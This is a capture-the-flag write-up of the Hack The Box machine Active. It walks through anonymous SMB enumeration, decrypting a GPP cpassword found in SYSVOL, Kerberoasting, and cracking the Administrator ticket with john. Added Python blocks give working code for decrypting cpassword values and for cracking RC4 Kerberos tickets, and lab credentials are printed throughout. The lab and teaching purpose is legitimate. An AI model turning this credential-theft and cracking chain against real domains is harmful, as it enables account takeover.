nihilist - 28 / 11 / 19

Active Writeup

Introduction :

Active is an easy Windows box released back in July 2018.

Part 1 : Initial Enumeration

As always, we begin our enumeration with Nmap to find the open ports.
We use the -F flag first: it scans only the 100 most common ports, which gives a quick first picture of the host before a slower, targeted scan.

  λ nihilist [ ] [ ~ ]
  → nmap -F
  Starting Nmap 7.80 ( ) at 2019-11-28 10:28 CET
  Nmap scan report for
  Host is up (0.079s latency).
  Not shown: 89 closed ports
  53/tcp    open  domain
  88/tcp    open  kerberos-sec
  135/tcp   open  msrpc
  139/tcp   open  netbios-ssn
  389/tcp   open  ldap
  445/tcp   open  microsoft-ds
  49152/tcp open  unknown
  49153/tcp open  unknown
  49154/tcp open  unknown
  49155/tcp open  unknown
  49157/tcp open  unknown

  Nmap done: 1 IP address (1 host up) scanned in 0.42 seconds

We are going to take a closer look at ports 53, 88, 135, 139, 389 and 445, using -sC for the default scripts and -sV for version detection. DNS, Kerberos, LDAP and SMB together on one host is the signature of an Active Directory domain controller, and the LDAP banner below confirms the domain name active.htb.

  λ nihilist [ ] [ ~ ]
  → nmap -sC -sV -Pn -p 53,88,135,139,389,445
  Starting Nmap 7.80 ( ) at 2019-11-28 10:29 CET
  Nmap scan report for
  Host is up (0.086s latency).

  53/tcp  open  domain        Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
  | dns-nsid:
  |_  bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
  88/tcp  open  kerberos-sec  Microsoft Windows Kerberos (server time: 2019-11-28 09:30:01Z)
  135/tcp open  msrpc         Microsoft Windows RPC
  139/tcp open  netbios-ssn   Microsoft Windows netbios-ssn
  389/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
  445/tcp open  microsoft-ds?
  Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows

  Host script results:
  |_clock-skew: 17s
  | smb2-security-mode:
  |   2.02:
  |_    Message signing enabled and required
  | smb2-time:
  |   date: 2019-11-28T09:30:07
  |_  start_date: 2019-11-28T09:25:41

  Service detection performed. Please report any incorrect results at .
  Nmap done: 1 IP address (1 host up) scanned in 20.66 seconds

Part 2 : Getting User Access

To enumerate the SMB shares we will be working with, we start with enum4linux over a null session (empty username and password). The "Cant load /etc/samba/smb.conf" messages come from the Samba configuration on the attacking machine, not from the target, and only break the workgroup lookups; the share enumeration still works.

  λ nihilist [ ] [ ~ ]
→ enum4linux
Starting enum4linux v0.8.9 ( ) on Thu Nov 28 10:52:05 2019

|    Target Information    |
Target ...........
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none

|    Enumerating Workgroup/Domain on    |
Cant load /etc/samba/smb.conf - run testparm to debug it
[E] Cant find workgroup/domain

|    Nbtstat Information for    |
Cant load /etc/samba/smb.conf - run testparm to debug it
Looking up status of
No reply from

|    Session Check on    |
[+] Server allows sessions using username '', password ''
[+] Got domain/workgroup name:

|    Getting domain SID for    |
Unable to initialize messaging context
rpcclient: Cant load /etc/samba/smb.conf - run testparm to debug it
[+] Cant determine if host is part of domain or part of a workgroup

|    OS information on    |
[+] Got OS info for from smbclient:
[+] Got OS info for from srvinfo:
Unable to initialize messaging context
rpcclient: Cant load /etc/samba/smb.conf - run testparm to debug it

|    Users on    |

|    Share Enumeration on    |
Unable to initialize messaging context
smbclient: Cant load /etc/samba/smb.conf - run testparm to debug it
do_connect: Connection to failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)

	Sharename       Type      Comment
	---------       ----      -------
	ADMIN$          Disk      Remote Admin
	C$              Disk      Default share
	IPC$            IPC       Remote IPC
	NETLOGON        Disk      Logon server share
	Replication     Disk
	SYSVOL          Disk      Logon server share
	Users           Disk
Reconnecting with SMB1 for workgroup listing.
Unable to connect with SMB1 -- no workgroup available

[+] Attempting to map shares on
//$	Mapping: DENIED, Listing: N/A
//$	Mapping: DENIED, Listing: N/A
//$	Mapping: OK	Listing: DENIED
//	Mapping: DENIED, Listing: N/A
//	Mapping: OK, Listing: OK
//	Mapping: DENIED, Listing: N/A
//	Mapping: DENIED, Listing: N/A

|    Password Policy Information for    |
[E] Unexpected error from polenum:
Traceback (most recent call last):
  File "/usr/bin/polenum", line 16, in 
    from impacket.dcerpc.v5.rpcrt import DCERPC_v5
ImportError: No module named impacket.dcerpc.v5.rpcrt
[+] Retieved partial password policy with rpcclient:

|    Groups on    |

[+] Getting builtin groups:

[+] Getting builtin group memberships:

[+] Getting local groups:

[+] Getting local group memberships:

[+] Getting domain groups:

[+] Getting domain group memberships:

|    Users on via RID cycling (RIDS: 500-550,1000-1050)    |

|    Getting printer info for    |
Unable to initialize messaging context
rpcclient: Cant load /etc/samba/smb.conf - run testparm to debug it

enum4linux complete on Thu Nov 28 10:53:01 2019

The share mapping shows that the anonymous session can both map and list the Replication share (the rows follow the order of the share listing above). As its contents show below, Replication holds the same tree as SYSVOL (Policies, scripts, DfsrPrivate), and SYSVOL is where domain controllers publish Group Policy, including any Group Policy Preferences files, so we navigate into it to see what we can work with.

λ root [ ] [/home/nihilist] → smbclient -N -U "" //
Unable to initialize messaging context
smbclient: Cant load /etc/samba/smb.conf - run testparm to debug it
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Sat Jul 21 12:37:44 2018
  ..                                  D        0  Sat Jul 21 12:37:44 2018
  active.htb                          D        0  Sat Jul 21 12:37:44 2018

		10459647 blocks of size 4096. 4931286 blocks available
smb: \> cd active.htb
smb: \active.htb\> ls
  .                                   D        0  Sat Jul 21 12:37:44 2018
  ..                                  D        0  Sat Jul 21 12:37:44 2018
  DfsrPrivate                       DHS        0  Sat Jul 21 12:37:44 2018
  Policies                            D        0  Sat Jul 21 12:37:44 2018
  scripts                             D        0  Wed Jul 18 20:48:57 2018

		10459647 blocks of size 4096. 4931286 blocks available
smb: \active.htb\> cd scripts
smb: \active.htb\scripts\> ls
  .                                   D        0  Wed Jul 18 20:48:57 2018
  ..                                  D        0  Wed Jul 18 20:48:57 2018

		10459647 blocks of size 4096. 4931286 blocks available
smb: \active.htb\scripts\> cd ..
smb: \active.htb\> cd DfsPrivate
cd \active.htb\DfsPrivate\: NT_STATUS_OBJECT_NAME_NOT_FOUND
smb: \active.htb\> ls
  .                                   D        0  Sat Jul 21 12:37:44 2018
  ..                                  D        0  Sat Jul 21 12:37:44 2018
  DfsrPrivate                       DHS        0  Sat Jul 21 12:37:44 2018
  Policies                            D        0  Sat Jul 21 12:37:44 2018
  scripts                             D        0  Wed Jul 18 20:48:57 2018

		10459647 blocks of size 4096. 4931286 blocks available
smb: \active.htb\> cd Policies
smb: \active.htb\Policies\> ls
  .                                   D        0  Sat Jul 21 12:37:44 2018
  ..                                  D        0  Sat Jul 21 12:37:44 2018
  {31B2F340-016D-11D2-945F-00C04FB984F9}      D        0  Sat Jul 21 12:37:44 2018
  {6AC1786C-016F-11D2-945F-00C04fB984F9}      D        0  Sat Jul 21 12:37:44 2018

		10459647 blocks of size 4096. 4931286 blocks available
smb: \active.htb\Policies\> cd {31B2F340-016D-11D2-945F-00C04FB984F9}
smb: \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\> ls
  .                                   D        0  Sat Jul 21 12:37:44 2018
  ..                                  D        0  Sat Jul 21 12:37:44 2018
  GPT.INI                             A       23  Wed Jul 18 22:46:06 2018
  Group Policy                        D        0  Sat Jul 21 12:37:44 2018
  MACHINE                             D        0  Sat Jul 21 12:37:44 2018
  USER                                D        0  Wed Jul 18 20:49:12 2018

		10459647 blocks of size 4096. 4931286 blocks available
smb: \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\> cd MACHINE
smb: \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\> ls
  .                                   D        0  Sat Jul 21 12:37:44 2018
  ..                                  D        0  Sat Jul 21 12:37:44 2018
  Microsoft                           D        0  Sat Jul 21 12:37:44 2018
  Preferences                         D        0  Sat Jul 21 12:37:44 2018
  Registry.pol                        A     2788  Wed Jul 18 20:53:45 2018

		10459647 blocks of size 4096. 4931286 blocks available
smb: \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\> cd Preferences
smb: \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\> ls
  .                                   D        0  Sat Jul 21 12:37:44 2018
  ..                                  D        0  Sat Jul 21 12:37:44 2018
  Groups                              D        0  Sat Jul 21 12:37:44 2018
		10459647 blocks of size 4096. 4931286 blocks available
smb: \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\> cd Groups
smb: \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\> ls
  .                                   D        0  Sat Jul 21 12:37:44 2018
  ..                                  D        0  Sat Jul 21 12:37:44 2018
  Groups.xml                          A      533  Wed Jul 18 22:46:06 2018

		10459647 blocks of size 4096. 4931286 blocks available
smb: \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\> get Groups.xml
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\Groups.xml of size 533 as Groups.xml (1.6 KiloBytes/sec) (average 1.6 KiloBytes/sec)
smb: \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\> exit

Opening up the Groups.xml file we see that it defines a domain user through Group Policy Preferences and carries a cpassword attribute. This is not a hash: it is the account password, AES-256-CBC encrypted with a static key that Microsoft itself published in the MS-GPPREF documentation, so anyone who can read SYSVOL can recover the clear-text password. MS14-025 stopped Windows from writing new cpassword values, but it did not remove the ones already sitting in SYSVOL.

  λ root [ ] [nihilist/_HTB/Active] → cat Groups.xml
<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\SVC_TGS" image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}"><Properties action="U" newName="" fullName="" description="" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\SVC_TGS"/>

So we have a username, active.htb\SVC_TGS, and the encrypted cpassword that goes with it.

We will use the gpp-decrypt tool, which simply applies the published key, to turn the cpassword back into the password.

  λ root [ ] [nihilist/_HTB/Active] →  gpp-decrypt edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ
  /usr/bin/gpp-decrypt:21: warning: constant OpenSSL::Cipher::Cipher is deprecated

And we now have the credentials SVC_TGS:GPPstillStandingStrong2k18 ! Let's see if they let us log in over SMB.
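To make clear what gpp-decrypt is doing (and why this is decryption rather than cracking), here is an added Python example that is not part of the original writeup or of the gpp-decrypt tool. It restores the base64 padding that Windows strips, decrypts with the static AES-256 key from MS-GPPREF and an all-zero IV, strips the PKCS#7 padding and decodes the UTF-16LE result. It also walks a GPP XML file for every cpassword it contains, going a little beyond Groups.xml: Services.xml, ScheduledTasks.xml, DataSources.xml, Drives.xml and Printers.xml carry the same attribute under different account attribute names. The sample XML is the Groups.xml pulled above with the closing tags the terminal capture cut off restored; the example assumes either the cryptography or the pycryptodome package is installed for AES.

```python
import base64
import xml.etree.ElementTree as ET

# Static AES-256 key Microsoft published in the [MS-GPPREF] specification (section 2.2.1.1.4).
# Every domain uses this same key, which is why a cpassword is reversible rather than "hashed".
GPP_AES_KEY = bytes.fromhex(
    "4e9906e8fcb66cc9faf49310620ffee8f496e806cc057990209b09a433b66c1b"
)
GPP_AES_IV = bytes(16)  # CBC mode with an all-zero IV


def _aes_cbc_decrypt(key: bytes, iv: bytes, data: bytes) -> bytes:
    """Raw AES-CBC decryption with whichever library is installed (cryptography or pycryptodome)."""
    try:
        from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes
        dec = Cipher(algorithms.AES(key), modes.CBC(iv)).decryptor()
        return dec.update(data) + dec.finalize()
    except ImportError:
        from Crypto.Cipher import AES
        return AES.new(key, AES.MODE_CBC, iv).decrypt(data)


def gpp_decrypt(cpassword: str) -> str:
    """Turn a Group Policy Preferences cpassword attribute back into the clear-text password."""
    # Windows strips the '=' padding from the base64 value; restore it before decoding.
    ciphertext = base64.b64decode(cpassword + "=" * (-len(cpassword) % 4))
    if not ciphertext or len(ciphertext) % 16:
        raise ValueError("cpassword is not a whole number of AES blocks")
    plaintext = _aes_cbc_decrypt(GPP_AES_KEY, GPP_AES_IV, ciphertext)
    # PKCS#7 padding check: a corrupted value almost never passes this.
    pad = plaintext[-1]
    if not 1 <= pad <= 16 or plaintext[-pad:] != bytes([pad]) * pad:
        raise ValueError("bad PKCS#7 padding: corrupted cpassword")
    return plaintext[:-pad].decode("utf-16-le")  # GPP stores the password as UTF-16LE


def find_gpp_credentials(xml_text: str) -> list:
    """Return every (account, password) pair stored in a GPP XML file.

    The cpassword attribute sits on a <Properties> element in all GPP file types; the account
    attribute differs (userName, accountName for Services.xml, runAs for ScheduledTasks.xml,
    username for DataSources.xml), so each of them is tried.
    """
    found = []
    for props in ET.fromstring(xml_text.encode("utf-8")).iter("Properties"):
        cpassword = props.get("cpassword")
        if not cpassword:
            continue  # a preference item without a stored password
        account = (props.get("userName") or props.get("accountName")
                   or props.get("runAs") or props.get("username") or "?")
        found.append((account, gpp_decrypt(cpassword)))
    return found


# Constructed sample: the Groups.xml from the Replication share, with its closing tags restored.
SAMPLE_GROUPS_XML = """<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\\SVC_TGS" image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}"><Properties action="U" newName="" fullName="" description="" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\\SVC_TGS"/></User></Groups>
"""

if __name__ == "__main__":
    for account, password in find_gpp_credentials(SAMPLE_GROUPS_XML):
        print(f"{account}:{password}")
```

Anything that can read SYSVOL, meaning every domain user and, as on this box, sometimes an anonymous session, can do the same, which is why any cpassword still present in SYSVOL should be treated as an already leaked credential and the account's password rotated.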

  λ root [ ] [nihilist/_HTB/Active] → smbclient -U svc_tgs //
Unable to initialize messaging context
smbclient: Can't load /etc/samba/smb.conf - run testparm to debug it
Enter WORKGROUP\svc_tgs's password:
Try "help" to get a list of possible commands.
smb: \> whoami
whoami: command not found
smb: \> id
id: command not found
smb: \> ls
  .                                  DR        0  Sat Jul 21 16:39:20 2018
  ..                                 DR        0  Sat Jul 21 16:39:20 2018
  Administrator                       D        0  Mon Jul 16 12:14:21 2018
  All Users                         DHS        0  Tue Jul 14 07:06:44 2009
  Default                           DHR        0  Tue Jul 14 08:38:21 2009
  Default User                      DHS        0  Tue Jul 14 07:06:44 2009
  desktop.ini                       AHS      174  Tue Jul 14 06:57:55 2009
  Public                             DR        0  Tue Jul 14 06:57:55 2009
  SVC_TGS                             D        0  Sat Jul 21 17:16:32 2018

		10459647 blocks of size 4096. 4924856 blocks available
smb: \> cd SVC_TGS
smb: \SVC_TGS\> ls
  .                                   D        0  Sat Jul 21 17:16:32 2018
  ..                                  D        0  Sat Jul 21 17:16:32 2018
  Contacts                            D        0  Sat Jul 21 17:14:11 2018
  Desktop                             D        0  Sat Jul 21 17:14:42 2018
  Downloads                           D        0  Sat Jul 21 17:14:23 2018
  Favorites                           D        0  Sat Jul 21 17:14:44 2018
  Links                               D        0  Sat Jul 21 17:14:57 2018
  My Documents                        D        0  Sat Jul 21 17:15:03 2018
  My Music                            D        0  Sat Jul 21 17:15:32 2018
  My Pictures                         D        0  Sat Jul 21 17:15:43 2018
  My Videos                           D        0  Sat Jul 21 17:15:53 2018
  Saved Games                         D        0  Sat Jul 21 17:16:12 2018
  Searches                            D        0  Sat Jul 21 17:16:24 2018

		10459647 blocks of size 4096. 4924856 blocks available
smb: \SVC_TGS\> cd Desktop
smb: \SVC_TGS\Desktop\> ls
  .                                   D        0  Sat Jul 21 17:14:42 2018
  ..                                  D        0  Sat Jul 21 17:14:42 2018
  user.txt                            A       34  Sat Jul 21 17:06:25 2018

		10459647 blocks of size 4096. 4924856 blocks available
smb: \SVC_TGS\Desktop\> get user.txt
getting file \SVC_TGS\Desktop\user.txt of size 34 as user.txt (0.1 KiloBytes/sec) (average 0.1 KiloBytes/sec)
smb: \SVC_TGS\Desktop\> exit

λ root [ ] [nihilist/_HTB/Active] → cat user.txt

And that's it ! We have been able to log in as SVC_TGS over SMB and read the user flag from that user's Desktop.

Part 3 : Getting Root Access

Earlier our nmap scan picked up port 88 running Kerberos, which makes this domain a candidate for Kerberoasting. Any authenticated domain user (we now have SVC_TGS) can ask the KDC for a service ticket (TGS) for any SPN registered in the domain; that ticket is encrypted with the NT hash of the account the SPN belongs to, so it can be taken offline and brute-forced without touching the target account or generating failed logons. We will run the PyKerberoast script with the SVC_TGS credentials: it binds to the domain's LDAP under cn=users,dc=active,dc=htb to find accounts with an SPN and requests a ticket for each. The 17s clock skew nmap reported is well within the 5-minute window Kerberos tolerates, so no clock adjustment is needed.

λ root [ ] [_HTB/Active/PyKerberoast] at  master ✔
→ python2 -a -b cn=users,dc=active,dc=htb -d active -u svc_tgs -p GPPstillStandingStrong2k18 > HASH.txt

λ root [ ] [_HTB/Active/PyKerberoast] at  master ✔
→ cat HASH.txt


Now we have a ticket for an SPN that is registered to the Administrator account ! Since it is RC4-HMAC (etype 23, as John reports below) encrypted under that account's NT hash, we just need to run john with rockyou.txt to find the password. AES-encrypted tickets (etype 17/18) would be far slower to crack, which is one reason to disable RC4 for service accounts.

john -w=rockyou.txt HASH.txt
Using default input encoding: UTF-8
Loaded 1 password hash (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status

Ticketmaster1968 (?)

1g 0:00:00:39 DONE (2019-11-28 13:34) 0.02515g/s 265093p/s 265093c/s 265093C/s Tiffani1432..Tiago_18
Use the "--show" option to display all of the cracked passwords reliably
Session completed
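What John is doing with each rockyou candidate, as an added Python example that is not part of the original writeup or of PyKerberoast: the candidate is turned into an NT hash (MD4 of the UTF-16LE password), the RC4-HMAC (etype 23) keys K1 and K3 are derived from it as in RFC 4757, the ticket is decrypted and the HMAC-MD5 checksum is recomputed; a match means the candidate is the service account's password. Since HASH.txt is not reproduced above, the example constructs its own ticket for Administrator with a made-up SPN and a four-word wordlist, both labelled as constructed; MD4 and RC4 are implemented inline so it runs on a stock Python install with no extra packages.

```python
import hashlib
import hmac
import os
import struct

# Key usage the KDC uses when it encrypts the ticket inside a TGS-REP (RFC 4120, section 7.5.1).
KDC_REP_TICKET_USAGE = 2

def md4(data: bytes) -> bytes:
    """Pure-Python MD4 (RFC 1320); hashlib's md4 is frequently disabled on OpenSSL 3 systems."""
    rol = lambda x, n: ((x << n) | (x >> (32 - n))) & 0xFFFFFFFF
    f = lambda x, y, z: (x & y) | (~x & z)
    g = lambda x, y, z: (x & y) | (x & z) | (y & z)
    msg = bytearray(data) + b"\x80"
    while len(msg) % 64 != 56:
        msg += b"\x00"
    msg += struct.pack("<Q", len(data) * 8)
    h = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    for off in range(0, len(msg), 64):
        X = struct.unpack("<16I", msg[off:off + 64])
        a, b, c, d = h
        for i in range(16):  # round 1
            a = rol((a + f(b, c, d) + X[i]) & 0xFFFFFFFF, (3, 7, 11, 19)[i % 4])
            a, b, c, d = d, a, b, c
        for i in range(16):  # round 2: word order 0,4,8,12,1,5,9,13,...
            a = rol((a + g(b, c, d) + X[(i % 4) * 4 + i // 4] + 0x5A827999) & 0xFFFFFFFF, (3, 5, 9, 13)[i % 4])
            a, b, c, d = d, a, b, c
        for i, k in enumerate((0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15)):  # round 3
            a = rol((a + (b ^ c ^ d) + X[k] + 0x6ED9EBA1) & 0xFFFFFFFF, (3, 9, 11, 15)[i % 4])
            a, b, c, d = d, a, b, c
        h = [(v + w) & 0xFFFFFFFF for v, w in zip(h, (a, b, c, d))]
    return struct.pack("<4I", *h)

def nt_hash(password: str) -> bytes:
    """NT hash = MD4(UTF-16LE password); this is also the account's RC4-HMAC Kerberos key."""
    return md4(password.encode("utf-16-le"))

def rc4(key: bytes, data: bytes) -> bytes:
    S, j = list(range(256)), 0
    for i in range(256):  # key scheduling
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out, i, j = bytearray(), 0, 0
    for byte in data:  # keystream generation
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(byte ^ S[(S[i] + S[j]) & 0xFF])
    return bytes(out)

def _hmac_md5(key: bytes, data: bytes) -> bytes:
    return hmac.new(key, data, hashlib.md5).digest()

def rc4_hmac_encrypt(key: bytes, usage: int, plaintext: bytes, confounder: bytes) -> bytes:
    """RFC 4757 encryption as the KDC performs it: checksum || RC4(K3, confounder || plaintext)."""
    k1 = _hmac_md5(key, struct.pack("<I", usage))
    data = confounder + plaintext
    checksum = _hmac_md5(k1, data)
    return checksum + rc4(_hmac_md5(k1, checksum), data)

def rc4_hmac_verify(key: bytes, usage: int, checksum: bytes, ciphertext: bytes) -> bool:
    """Does this key open the ticket? Checks the full HMAC instead of peeking at decrypted bytes."""
    k1 = _hmac_md5(key, struct.pack("<I", usage))
    data = rc4(_hmac_md5(k1, checksum), ciphertext)
    return hmac.compare_digest(_hmac_md5(k1, data), checksum)

def parse_krb5tgs(line: str):
    """Split a John/hashcat line '$krb5tgs$23$*user$REALM$spn*$checksum$edata' into its parts."""
    prefix = "$krb5tgs$23$*"
    if not line.startswith(prefix):
        raise ValueError("only etype 23 (RC4-HMAC) lines with a *user$realm$spn* label are handled")
    label, blob = line[len(prefix):].split("*$", 1)
    checksum_hex, edata_hex = blob.split("$", 1)
    return label, bytes.fromhex(checksum_hex), bytes.fromhex(edata_hex)

def crack_krb5tgs(line: str, wordlist):
    """What John does per candidate: derive the NT hash, then test it against the ticket."""
    _, checksum, edata = parse_krb5tgs(line)
    for candidate in wordlist:
        if rc4_hmac_verify(nt_hash(candidate), KDC_REP_TICKET_USAGE, checksum, edata):
            return candidate
    return None

def make_sample_ticket(password: str, spn: str = "hypothetical/spn.active.htb") -> str:
    """Constructed stand-in for HASH.txt: a ticket encrypted under the account's NT hash (the SPN is made up)."""
    body = b"\x63\x82" + bytes(94)  # a real ticket is DER starting with the APPLICATION 3 tag; filler after it
    edata = rc4_hmac_encrypt(nt_hash(password), KDC_REP_TICKET_USAGE, body, os.urandom(8))
    return f"$krb5tgs$23$*Administrator$ACTIVE.HTB${spn}*${edata[:16].hex()}${edata[16:].hex()}"

if __name__ == "__main__":
    ticket = make_sample_ticket("Ticketmaster1968")
    wordlist = ["password", "Tiffani1432", "Ticketmaster1968", "Tiago_18"]  # constructed mini wordlist
    print("cracked:", crack_krb5tgs(ticket, wordlist))
```

John and hashcat take a shortcut here: they decrypt only the first block and look for the DER tag of a Ticket (0x63 0x82 ...) instead of recomputing the full HMAC, which is how they reach the 265k candidates per second shown above; the work per candidate is otherwise exactly this. The only defence that matters on the service-account side is a password that is not in any wordlist (or a gMSA, whose 120-character password is rotated automatically), since the ticket request itself is legitimate traffic.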

Now we have the Administrator password ! Let's try to log in using our newly acquired credentials : Administrator:Ticketmaster1968

  λ root [ ] [nihilist/_HTB/Active] → smbclient -U administrator //
Unable to initialize messaging context
smbclient: Can't load /etc/samba/smb.conf - run testparm to debug it
Enter WORKGROUP\administrator's password:
Try "help" to get a list of possible commands.
smb: \> ls
  .                                  DR        0  Sat Jul 21 16:39:20 2018
  ..                                 DR        0  Sat Jul 21 16:39:20 2018
  Administrator                       D        0  Mon Jul 16 12:14:21 2018
  All Users                         DHS        0  Tue Jul 14 07:06:44 2009
  Default                           DHR        0  Tue Jul 14 08:38:21 2009
  Default User                      DHS        0  Tue Jul 14 07:06:44 2009
  desktop.ini                       AHS      174  Tue Jul 14 06:57:55 2009
  Public                             DR        0  Tue Jul 14 06:57:55 2009
  SVC_TGS                             D        0  Sat Jul 21 17:16:32 2018

		10459647 blocks of size 4096. 4924582 blocks available
smb: \> cd Administrator
smb: \Administrator\> ls
  .                                   D        0  Mon Jul 16 12:14:21 2018
  ..                                  D        0  Mon Jul 16 12:14:21 2018
  AppData                            DH        0  Mon Jul 16 12:14:15 2018
  Application Data                  DHS        0  Mon Jul 16 12:14:15 2018
  Contacts                           DR        0  Mon Jul 30 15:50:10 2018
  Cookies                           DHS        0  Mon Jul 16 12:14:15 2018
  Desktop                            DR        0  Mon Jul 30 15:50:10 2018
  Documents                          DR        0  Mon Jul 30 15:50:10 2018
  Downloads                          DR        0  Mon Jul 30 15:50:27 2018
  Favorites                          DR        0  Mon Jul 30 15:50:10 2018
  Links                              DR        0  Mon Jul 30 15:50:10 2018
  Local Settings                    DHS        0  Mon Jul 16 12:14:15 2018
  Music                              DR        0  Mon Jul 30 15:50:10 2018
  My Documents                      DHS        0  Mon Jul 16 12:14:15 2018
  NetHood                           DHS        0  Mon Jul 16 12:14:15 2018
  NTUSER.DAT                        AHS   524288  Mon Jul 30 19:21:29 2018
  ntuser.dat.LOG1                   AHS   262144  Thu Nov 28 11:26:05 2019
  ntuser.dat.LOG2                   AHS        0  Mon Jul 16 12:14:09 2018
  NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf    AHS    65536  Mon Jul 16 12:14:15 2018
  NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms    AHS   524288  Mon Jul 16 12:14:15 2018
  NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms    AHS   524288  Mon Jul 16 12:14:15 2018
  ntuser.ini                         HS       20  Mon Jul 16 12:14:15 2018
  Pictures                           DR        0  Mon Jul 30 15:50:10 2018
  PrintHood                         DHS        0  Mon Jul 16 12:14:15 2018
  Recent                            DHS        0  Mon Jul 16 12:14:15 2018
  Saved Games                        DR        0  Mon Jul 30 15:50:10 2018
  Searches                           DR        0  Mon Jul 30 15:50:10 2018
  SendTo                            DHS        0  Mon Jul 16 12:14:15 2018
  Start Menu                        DHS        0  Mon Jul 16 12:14:15 2018
  Templates                         DHS        0  Mon Jul 16 12:14:15 2018
  Videos                             DR        0  Mon Jul 30 15:50:10 2018

		10459647 blocks of size 4096. 4924582 blocks available
smb: \Administrator\> cd Desktop
smb: \Administrator\Desktop\> ls
  .                                  DR        0  Mon Jul 30 15:50:10 2018
  ..                                 DR        0  Mon Jul 30 15:50:10 2018
  desktop.ini                       AHS      282  Mon Jul 30 15:50:10 2018
  root.txt                            A       34  Sat Jul 21 17:06:07 2018

		10459647 blocks of size 4096. 4924582 blocks available
smb: \Administrator\Desktop\> get root.txt
getting file \Administrator\Desktop\root.txt of size 34 as root.txt (0.1 KiloBytes/sec) (average 0.1 KiloBytes/sec)
smb: \Administrator\Desktop\> exit

λ root [ ] [nihilist/_HTB/Active] → cat root.txt

And that's it ! The cracked password gave us access to the Administrator user over SMB, and therefore we have been able to read the root flag from the Administrator's Desktop. The whole chain needed nothing more than an anonymous SMB session, a cpassword left behind in SYSVOL, and a privileged account that had an SPN and a wordlist password.


Here we can see the progress graph :